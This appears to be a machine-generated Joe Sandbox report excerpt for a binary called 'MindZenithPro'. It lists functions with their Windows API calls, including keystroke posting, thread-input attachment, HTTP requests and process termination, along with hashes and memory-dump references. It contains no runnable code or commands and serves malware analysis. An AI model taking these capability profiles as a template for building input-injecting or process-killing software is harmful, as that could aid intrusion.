                                    • Instruction Fuzzy Hash: C421C975E00228BBCF11EFA0DC85EEEBBB4EF04304F104457B951D72A2C6799846DB65
                                    Function 004541E1 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 0045425B
                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 0045425E
                                    • GetWindowLongW.USER32(?,000000F0), ref: 00454285
                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004542A8
                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00454320
                                    • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 0045436A
                                    • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00454385
                                    • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 004543A0
                                    • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 004543B4
                                    • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 004543D1
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: MessageSend$LongWindow
                                    • String ID:
                                    • API String ID: 312131281-0
                                    • Opcode ID: 9b6a4b21657f525f93b85547d44a02694b45933dd780a74fd642852bcc45db3e
                                    • Instruction ID: 518d0e736b8d6632d51e554ba05d9a0ccb860267ab88eaf7566f88d6acde34ce
                                    • Opcode Fuzzy Hash: 9b6a4b21657f525f93b85547d44a02694b45933dd780a74fd642852bcc45db3e
                                    • Instruction Fuzzy Hash: 11616D75A00218AFDB10DFA4CD81EEE77B8AB49314F10016AFE04EB3A2D7B4AD45DB54
                                    Function 0042B830 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentThreadId.KERNEL32 ref: 0042B852
                                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,0042A8E2,?,00000001), ref: 0042B866
                                    • GetWindowThreadProcessId.USER32(00000000), ref: 0042B86D
                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0042A8E2,?,00000001), ref: 0042B87C
                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 0042B88E
                                    • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0042A8E2,?,00000001), ref: 0042B8A7
                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0042A8E2,?,00000001), ref: 0042B8B9
                                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0042A8E2,?,00000001), ref: 0042B8FE
                                    • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0042A8E2,?,00000001), ref: 0042B913
                                    • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0042A8E2,?,00000001), ref: 0042B91E
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                    • String ID:
                                    • API String ID: 2156557900-0
                                    • Opcode ID: 6fc41b0aa304ecee46593491059187acfe38f153b3df36cb1bc8488af46a8a64
                                    • Instruction ID: 15171f4739e38e837c0f24365cddcda7bc0ef819654f1b4828d54fdfb3856bf7
                                    • Opcode Fuzzy Hash: 6fc41b0aa304ecee46593491059187acfe38f153b3df36cb1bc8488af46a8a64
                                    • Instruction Fuzzy Hash: 063182B1A00314AFDB309F24EC44F6A77A9EF55316F504036FA04D72A1D7789981DBA9
                                    Function 003F2FD0 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                    Download Yara Rule
                                    APIs
                                    • _free.LIBCMT ref: 003F2FE4
                                      • Part of subcall function 003F2D18: RtlFreeHeap.NTDLL(00000000,00000000,?,003FDB22,?,00000000,?,00000000,?,003FDB49,?,00000007,?,?,003FDF46,?), ref: 003F2D2E
                                      • Part of subcall function 003F2D18: GetLastError.KERNEL32(?,?,003FDB22,?,00000000,?,00000000,?,003FDB49,?,00000007,?,?,003FDF46,?,?), ref: 003F2D40
                                    • _free.LIBCMT ref: 003F2FF0
                                    • _free.LIBCMT ref: 003F2FFB
                                    • _free.LIBCMT ref: 003F3006
                                    • _free.LIBCMT ref: 003F3011
                                    • _free.LIBCMT ref: 003F301C
                                    • _free.LIBCMT ref: 003F3027
                                    • _free.LIBCMT ref: 003F3032
                                    • _free.LIBCMT ref: 003F303D
                                    • _free.LIBCMT ref: 003F304B
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: af6068010592f79fde9df41fbabd32be19c788d00c90c3c4f97c20b1c7958472
                                    • Instruction ID: 3e9c3d916c49e79380c4de85eae25c27371283f3c49a32ebe3a97109338c8015
                                    • Opcode Fuzzy Hash: af6068010592f79fde9df41fbabd32be19c788d00c90c3c4f97c20b1c7958472
                                    • Instruction Fuzzy Hash: 3E11587651010CFFEB02EF95C942CEE3BB5EF05350B6141A5FA189F622DA31DE509B81
                                    Function 0043855F Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0043871C
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00438730
                                    • GetFileAttributesW.KERNEL32(?), ref: 0043875A
                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00438774
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00438786
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 004387CF
                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0043881F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: CurrentDirectory$AttributesFile
                                    • String ID: *.*
                                    • API String ID: 769691225-438819550
                                    • Opcode ID: 7f7b16f580a1d6095b6ad36f7da2eb455494a7bd753e2ce7249e146c1f081f60
                                    • Instruction ID: 80820fbf635d18d7f8b9b6bcb7dce0075c9515fa094796f62a685fc248e489ca
                                    • Opcode Fuzzy Hash: 7f7b16f580a1d6095b6ad36f7da2eb455494a7bd753e2ce7249e146c1f081f60
                                    • Instruction Fuzzy Hash: BE818B725043409BCB20EF14C855AABF3E9AB98314F24582FF885DB351DB38ED458B9A
                                    Function 003C62A7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SetWindowLongW.USER32(?,000000EB), ref: 003C6337
                                      • Part of subcall function 003C63C7: GetClientRect.USER32(?,?), ref: 003C63ED
                                      • Part of subcall function 003C63C7: GetWindowRect.USER32(?,?), ref: 003C642E
                                      • Part of subcall function 003C63C7: ScreenToClient.USER32(?,?), ref: 003C6456
                                    • GetDC.USER32 ref: 0040509B
                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 004050AE
                                    • SelectObject.GDI32(00000000,00000000), ref: 004050BC
                                    • SelectObject.GDI32(00000000,00000000), ref: 004050D1
                                    • ReleaseDC.USER32(?,00000000), ref: 004050D9
                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0040516A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                    • String ID: U
                                    • API String ID: 4009187628-3372436214
                                    • Opcode ID: 4570350cc576e8f4526973f67d339306ce13a2daff8d7cba31270996b63adf90
                                    • Instruction ID: ac7a7682877d1a7a175dee94be371d154298da7bf9e1715d38cd3153439041e1
                                    • Opcode Fuzzy Hash: 4570350cc576e8f4526973f67d339306ce13a2daff8d7cba31270996b63adf90
                                    • Instruction Fuzzy Hash: 3D71CB31900609EFCF229F64C885BAB3BB5FF49314F18427AED51AA2A6C7398C41DF55
                                    Function 004591EE Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 003D9DD1: GetWindowLongW.USER32(00000000,000000EB), ref: 003D9DE2
                                      • Part of subcall function 003C135A: GetCursorPos.USER32(?), ref: 003C136E
                                      • Part of subcall function 003C135A: ScreenToClient.USER32(00000000,?), ref: 003C138B
                                      • Part of subcall function 003C135A: GetAsyncKeyState.USER32(00000001), ref: 003C13C2
                                      • Part of subcall function 003C135A: GetAsyncKeyState.USER32(00000002), ref: 003C13DC
                                    • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00459257
                                    • ImageList_EndDrag.COMCTL32 ref: 0045925D
                                    • ReleaseCapture.USER32 ref: 00459263
                                    • SetWindowTextW.USER32(?,00000000), ref: 004592FE
                                    • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00459311
                                    • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 004593EB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                    • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                    • API String ID: 1924731296-2107944366
                                    • Opcode ID: 7d96166cbe999b32df416515e8c12a38014594de4f5531bd88d9d40d420bfb27
                                    • Instruction ID: 76370f01b703b72227201ac8c70ccba59d3d4b9ade68f5082761cd3caad06d0e
                                    • Opcode Fuzzy Hash: 7d96166cbe999b32df416515e8c12a38014594de4f5531bd88d9d40d420bfb27
                                    • Instruction Fuzzy Hash: 7D51AD70604304AFD715EF14D896F6A77E4EB48719F000A2EF9519B2E2DBB49D08CB56
                                    Function 0043C9C2 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0043C9E1
                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0043CA09
                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0043CA39
                                    • GetLastError.KERNEL32 ref: 0043CA91
                                    • SetEvent.KERNEL32(?), ref: 0043CAA5
                                    • InternetCloseHandle.WININET(00000000), ref: 0043CAB0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                    • String ID:
                                    • API String ID: 3113390036-3916222277
                                    • Opcode ID: 7aeef7741092ce1c40e55ff68bda4f6b938b85bdc9bd019dd6bae4515322d6e5
                                    • Instruction ID: 026d597a06197d3fd8255459c20e104baf09bc3c85b17bed4bc2cf260b445862
                                    • Opcode Fuzzy Hash: 7aeef7741092ce1c40e55ff68bda4f6b938b85bdc9bd019dd6bae4515322d6e5
                                    • Instruction Fuzzy Hash: 18316BB5900308AFD721EF619888B6B7BFCEF49745F10552EF446E2201DB38D9049B69
                                    Function 00422781 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetParent.USER32 ref: 0042278D
                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 004227A2
                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0042282F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: ClassMessageNameParentSend
                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                    • API String ID: 1290815626-3381328864
                                    • Opcode ID: 5f1f3d0608bd5bb10fd0b727bf8a99c84e1bdfef820af07e1f7eb84cc859ffcb
                                    • Instruction ID: f7f9c622a964eb1684a520f14a119aca675454b78c187c548e6da1c9f5344213
                                    • Opcode Fuzzy Hash: 5f1f3d0608bd5bb10fd0b727bf8a99c84e1bdfef820af07e1f7eb84cc859ffcb
                                    • Instruction Fuzzy Hash: 5711E776748326B9F6113620AD0AEAB779C9F19734B700233F501E50D2EFA9E8514659
                                    Function 003FD1E1 Relevance: 13.7, APIs: 9, Instructions: 209COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                    • String ID:
                                    • API String ID: 1282221369-0
                                    • Opcode ID: 209ebbd7c432f62bd59ef311d43b64eda100ae30c3661a3126940d62dd0a5529
                                    • Instruction ID: c2647ebacdea5fe0940725bfdf89937aef2daec3f9e766d61823c9a1575fbeca
                                    • Opcode Fuzzy Hash: 209ebbd7c432f62bd59ef311d43b64eda100ae30c3661a3126940d62dd0a5529
                                    • Instruction Fuzzy Hash: 4861F6B190430DAFEF23AF74D889A7E7BA59F11310F15467EFB44AB291EB3199008791
                                    Function 00455894 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00455946
                                    • ShowWindow.USER32(?,00000000), ref: 00455987
                                    • ShowWindow.USER32(?,00000005,?,00000000), ref: 0045598D
                                    • SetFocus.USER32(?,?,00000005,?,00000000), ref: 00455991
                                      • Part of subcall function 00457685: DeleteObject.GDI32(00000000), ref: 004576B1
                                    • GetWindowLongW.USER32(?,000000F0), ref: 004559CD
                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004559DA
                                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00455A0D
                                    • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00455A47
                                    • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00455A56
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                    • String ID:
                                    • API String ID: 3210457359-0
                                    • Opcode ID: 065be364957abe7dc150ef7cd847f008f582688a8de6544d3fbee36872f4a512
                                    • Instruction ID: 597649c41a1fb0d8ff055cf76aca6d5daf1654c9e8458e7b2cebbe9a718dfe5a
                                    • Opcode Fuzzy Hash: 065be364957abe7dc150ef7cd847f008f582688a8de6544d3fbee36872f4a512
                                    • Instruction Fuzzy Hash: 8A51A270A10A18FFEB309F24CC65BA93B61AF04326F144117FD15962E2C37DAD89DB4A
                                    Function 003D8E2B Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00416F36
                                    • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00416F4F
                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00416F5F
                                    • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00416F77
                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00416F98
                                    • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,003D8E0E,00000000,00000000,00000000,000000FF,00000000), ref: 00416FA7
                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00416FC4
                                    • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,003D8E0E,00000000,00000000,00000000,000000FF,00000000), ref: 00416FD3
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Icon$DestroyExtractImageLoadMessageSend
                                    • String ID:
                                    • API String ID: 1268354404-0
                                    • Opcode ID: be1439079d65726579ecb9eeda023fa9c9d98f0de35a42005e32ff82ed7785f4
                                    • Instruction ID: ff603565afba38c8612c696b21f394b54d55744ca7abb4fee078186676eaa2f2
                                    • Opcode Fuzzy Hash: be1439079d65726579ecb9eeda023fa9c9d98f0de35a42005e32ff82ed7785f4
                                    • Instruction Fuzzy Hash: A5519771A00209AFDB21CF29EC45FAA7BB9EF48710F10412AF906973A0DB74E880CF44
                                    Function 0043C8B2 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0043C8F1
                                    • GetLastError.KERNEL32 ref: 0043C904
                                    • SetEvent.KERNEL32(?), ref: 0043C918
                                      • Part of subcall function 0043C9C2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0043C9E1
                                      • Part of subcall function 0043C9C2: GetLastError.KERNEL32 ref: 0043CA91
                                      • Part of subcall function 0043C9C2: SetEvent.KERNEL32(?), ref: 0043CAA5
                                      • Part of subcall function 0043C9C2: InternetCloseHandle.WININET(00000000), ref: 0043CAB0
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                    • String ID:
                                    • API String ID: 337547030-0
                                    • Opcode ID: b832b60c3c78b9ecdb4d60de69677161dd0773ae41dae65bdb09ca05d50d206d
                                    • Instruction ID: 7b5b5d869035aab84a5ac62bcfbe8162957cf1eb145a571f27fbe777f1741bea
                                    • Opcode Fuzzy Hash: b832b60c3c78b9ecdb4d60de69677161dd0773ae41dae65bdb09ca05d50d206d
                                    • Instruction Fuzzy Hash: 7A318DB5A00705BFDB219F61CC84A6BBBB8FF0C311F01542EF85692611C735E810EB69
                                    Function 00422C84 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00424128: GetWindowThreadProcessId.USER32(?,00000000), ref: 00424142
                                      • Part of subcall function 00424128: GetCurrentThreadId.KERNEL32 ref: 00424149
                                      • Part of subcall function 00424128: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00422C95), ref: 00424150
                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00422C9F
                                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00422CBD
                                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00422CC1
                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00422CCB
                                    • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00422CE3
                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00422CE7
                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00422CF1
                                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00422D05
                                    • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00422D09
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                    • String ID:
                                    • API String ID: 2014098862-0
                                    • Opcode ID: 3e015c31dae09bec45f76ad3d56dcaee70532585addd9bea0573837e4f34c6b0
                                    • Instruction ID: de78d40cf0e07b0608398d0dfec655c27452914b547a7b06c7d01cf8b9a3e3c6
                                    • Opcode Fuzzy Hash: 3e015c31dae09bec45f76ad3d56dcaee70532585addd9bea0573837e4f34c6b0
                                    • Instruction Fuzzy Hash: 7501D8307807247BFB2067699C8AF593F59EF59B13F500016F318EE1E1C9E554458A6D
                                    Function 0044A869 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0042DAC1: CreateToolhelp32Snapshot.KERNEL32 ref: 0042DAE6
                                      • Part of subcall function 0042DAC1: Process32FirstW.KERNEL32(00000000,?), ref: 0042DAF4
                                      • Part of subcall function 0042DAC1: FindCloseChangeNotification.KERNELBASE(00000000), ref: 0042DBC1
                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0044A8F4
                                    • GetLastError.KERNEL32 ref: 0044A907
                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0044A93A
                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 0044A9EF
                                    • GetLastError.KERNEL32(00000000), ref: 0044A9FA
